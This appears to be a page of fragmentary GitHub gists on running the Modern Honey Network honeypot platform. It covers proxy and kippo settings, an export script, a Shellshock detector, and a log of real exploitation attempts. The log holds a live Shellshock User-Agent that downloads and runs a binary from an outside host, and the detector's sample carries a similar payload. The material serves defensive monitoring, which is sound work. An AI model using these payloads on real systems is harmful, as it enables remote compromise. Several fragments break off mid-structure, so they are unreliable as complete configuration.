Jason Trost jatrost

For each of the files below, make sure the proxy settings are added (and obviously change the user/pass/domain/port placeholders to match your proxy).

These need to be set on both the MHN server and the honeypot systems you intend to deploy (assuming the honeypots are behind the firewall too). Keep in mind that /etc/environment is world-readable, so the proxy credentials placed in it are visible to every local account on that host; if the honeypots reach the MHN server directly rather than through the proxy, add its address to NO_PROXY as well.

/etc/environment

ALL_PROXY=http://user:pass@domain:8080
HTTP_PROXY=http://user:pass@domain:8080
HTTPS_PROXY=http://user:pass@domain:8080
{
"channels": [
"amun.events",
"dionaea.connections",
"dionaea.capture",
"glastopf.events",
"beeswarm.hive",
"kippo.sessions",
"conpot.events",
"snort.alerts",

{
"template": "mhn-*",
"settings": {
"number_of_shards": 5,
"number_of_replicas": 0,
"refresh_interval": "30s"
},
"mappings": {
"_default_": {
"_source": {

#!/bin/bash
# Export the last five minutes of honeypot sessions from mnemosyne as CSV.
# The query needs a Date, so date(1)'s epoch seconds get "000" appended to
# make the milliseconds new Date() expects; "\$gt" is escaped so the shell
# does not expand it inside the double quotes. --csv is the mongoexport 2.6
# flag (3.0 and later spell it --type=csv).
PAST_TIMESTAMP="$(date +%s -d '5 min ago')000"
mongoexport \
  --csv --quiet \
  --fields timestamp,source_ip,source_port,destination_port,honeypot \
  --db mnemosyne \
  --collection session \
  --query "{ timestamp: {\$gt: new Date($PAST_TIMESTAMP)}}" > /tmp/mhn-report.txt
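The export above only writes the raw sessions; the step a practitioner usually wants next is a quick summary of that five-minute window. This is an added example, not part of the gist, and it assumes the CSV shape mongoexport writes for the requested fields (header row first, Dates as ISO-8601 UTC strings). The sample rows are constructed with RFC 5737 test addresses, and the function names (load_report, window_span, summarize, noisy_sources) are my own.

```python
import csv
import io
from collections import Counter
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample in the assumed shape of the /tmp/mhn-report.txt output:
# header row, then one session per line. Addresses are RFC 5737 test ranges;
# this is not data from a live MHN.
SAMPLE_CSV = """\
timestamp,source_ip,source_port,destination_port,honeypot
2014-09-29T15:44:10.000Z,198.51.100.7,51234,22,kippo
2014-09-29T15:44:12.000Z,198.51.100.7,51240,22,kippo
2014-09-29T15:45:01.000Z,203.0.113.9,40001,445,dionaea
2014-09-29T15:45:03.000Z,203.0.113.9,40002,445,dionaea
2014-09-29T15:45:05.000Z,203.0.113.9,40003,80,glastopf
2014-09-29T15:46:30.000Z,192.0.2.44,33000,22,kippo
"""

TS_FORMAT = "%Y-%m-%dT%H:%M:%S.%fZ"


def load_report(text: str) -> List[Dict[str, str]]:
    """Parse the CSV written by the export script into one dict per session."""
    return list(csv.DictReader(io.StringIO(text)))


def window_span(rows: List[Dict[str, str]]) -> timedelta:
    """Time between oldest and newest session; sanity check that the
    5-minute $gt filter actually applied."""
    stamps = [datetime.strptime(r["timestamp"], TS_FORMAT) for r in rows]
    return max(stamps) - min(stamps)


def summarize(rows: List[Dict[str, str]], top: int = 5) -> Dict:
    """Counts per source IP and per (destination port, honeypot) pair."""
    by_source = Counter(r["source_ip"] for r in rows)
    by_service = Counter((r["destination_port"], r["honeypot"]) for r in rows)
    return {
        "sessions": len(rows),
        "top_sources": by_source.most_common(top),
        "top_services": by_service.most_common(top),
    }


def noisy_sources(rows: List[Dict[str, str]], threshold: int = 3) -> List[str]:
    """Sources with at least `threshold` sessions in the window: a cheap
    alerting rule on top of the periodic export."""
    counts = Counter(r["source_ip"] for r in rows)
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    rows = load_report(SAMPLE_CSV)
    print(f"{len(rows)} sessions over {window_span(rows)}")
    print(summarize(rows))
    print("noisy:", noisy_sources(rows))
```

Run it against the real file with load_report(open("/tmp/mhn-report.txt").read()); if window_span ever exceeds five minutes, the timestamp field in mnemosyne is not the Date the query assumes.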

I believe here is the fix. This just needs to be integrated into the kippo deploy.

ensure this is in the kippo.cfg

[honeypot]
ssh_addr = 127.0.0.1
ssh_port = 64222

{
"ok": true,
"message": "ok",
"result": [
{
"class": "in",
"type": "a",
"query": "www.google.com.",
"answer": "213.155.151.152",
"ttl": 300,

map $http_upgrade $connection_upgrade {
    default upgrade;
    '' close;
}
server {
    listen 8443 ssl;
    # One PEM holding both the certificate chain and the private key. Since
    # it contains the key, keep the file root-only; nginx reads it as root
    # at startup before dropping privileges.
    ssl_certificate /etc/ssl/private/mhn.yourcompany.com.pem;
    ssl_certificate_key /etc/ssl/private/mhn.yourcompany.com.pem;

sharklasers.com
grr.la
guerrillamail.biz
guerrillamail.com
guerrillamail.de
guerrillamail.net
guerrillamail.org
guerrillamailblock.com
spam4.me
maildrop.cc

vagrant@mhn-server:~$ mongo
MongoDB shell version: 2.6.4
connecting to: test
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
http://docs.mongodb.org/
Questions? Try the support group
http://groups.google.com/group/mongodb-user
> use hpfeeds
jatrost / exploitation-attempts.log
Created September 29, 2014 15:49
True Exploitation attempts
source_ip: 63.131.141.125
url: http://XXX.XXX.XXX.XXX/
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"
Content-Type: text/plain
source_ip: 63.131.141.125
url: http://XXX.XXX.XXX.XXX/cgi-bin/test.sh
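The User-Agent in the first entry is the Shellshock (CVE-2014-6271) prefix: an empty bash function body "() { :;}" followed by the command the attacker wants a vulnerable CGI host to run. The detector below is an added example, not part of the gist, that parses this log layout and flags any header carrying that prefix, pulling out the command and the download hosts it references. The sample entries are constructed with RFC 5737 test addresses (including a Referer-based variant the gist does not show), and the function names (parse_log, find_shellshock) are my own.

```python
import re
from typing import Dict, List

# Shellshock prefix as seen in the User-Agent above: an empty function body
# "() { :;}" then ";" and the real payload. Vulnerable bash executed that
# trailing command when a CGI handler exported the header into the
# environment. bash only parsed the value as a function when it began with
# "() {", but scanners vary the whitespace, so the detector searches loosely.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;\s*(?P<cmd>.+)")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOWNLOADERS = ("wget", "curl", "fetch")

# Constructed sample in the same layout as the gist's log. Addresses are
# RFC 5737 test ranges; this is not sensor data.
SAMPLE_LOG = """\
source_ip: 198.51.100.7
url: http://XXX.XXX.XXX.XXX/
HTTP Headers:
Content-Length:
Host: XXX.XXX.XXX.XXX
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/x 203.0.113.9/x;chmod +x /var/tmp/x;/var/tmp/x"
Content-Type: text/plain
source_ip: 198.51.100.8
url: http://XXX.XXX.XXX.XXX/cgi-bin/test.sh
HTTP Headers:
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (compatible; scanner)
Referer: () { :; }; /bin/bash -c "id"
Content-Type: text/plain
source_ip: 198.51.100.9
url: http://XXX.XXX.XXX.XXX/index.html
HTTP Headers:
Host: XXX.XXX.XXX.XXX
User-Agent: curl/7.38.0
"""


def parse_log(text: str) -> List[Dict]:
    """Split the flat log into records; each record starts at a 'source_ip:' line."""
    records: List[Dict] = []
    current = None
    in_headers = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("source_ip:"):
            current = {"source_ip": line.split(":", 1)[1].strip(),
                       "url": "", "headers": {}}
            records.append(current)
            in_headers = False
        elif current is None:
            continue  # text before the first record
        elif line.startswith("url:"):
            current["url"] = line.split(":", 1)[1].strip()
        elif line == "HTTP Headers:":
            in_headers = True
        elif in_headers:
            # Split on the first colon only: values such as "http://..." contain colons,
            # and an empty Content-Length yields an empty value rather than an error.
            name, _, value = line.partition(":")
            current["headers"][name.strip()] = value.strip()
    return records


def find_shellshock(records: List[Dict]) -> List[Dict]:
    """Return one hit per header carrying the function-definition prefix."""
    hits: List[Dict] = []
    for rec in records:
        for name, value in rec["headers"].items():
            m = SHELLSHOCK_RE.search(value)
            if not m:
                continue
            cmd = m.group("cmd").strip()
            hits.append({
                "source_ip": rec["source_ip"],
                "url": rec["url"],
                "header": name,
                "command": cmd,
                # Hosts the payload fetches from: the second-stage IOC to block or hunt.
                "ip_iocs": list(dict.fromkeys(IPV4_RE.findall(cmd))),
                "drops_binary": any(tool in cmd for tool in DOWNLOADERS),
            })
    return hits


if __name__ == "__main__":
    for h in find_shellshock(parse_log(SAMPLE_LOG)):
        print(f"{h['source_ip']} {h['url']} [{h['header']}] {h['command']} "
              f"iocs={h['ip_iocs']} drops_binary={h['drops_binary']}")
```

Any header can carry the payload, not just User-Agent, because CGI exports every request header as an HTTP_* variable; that is why the detector walks all headers rather than one field.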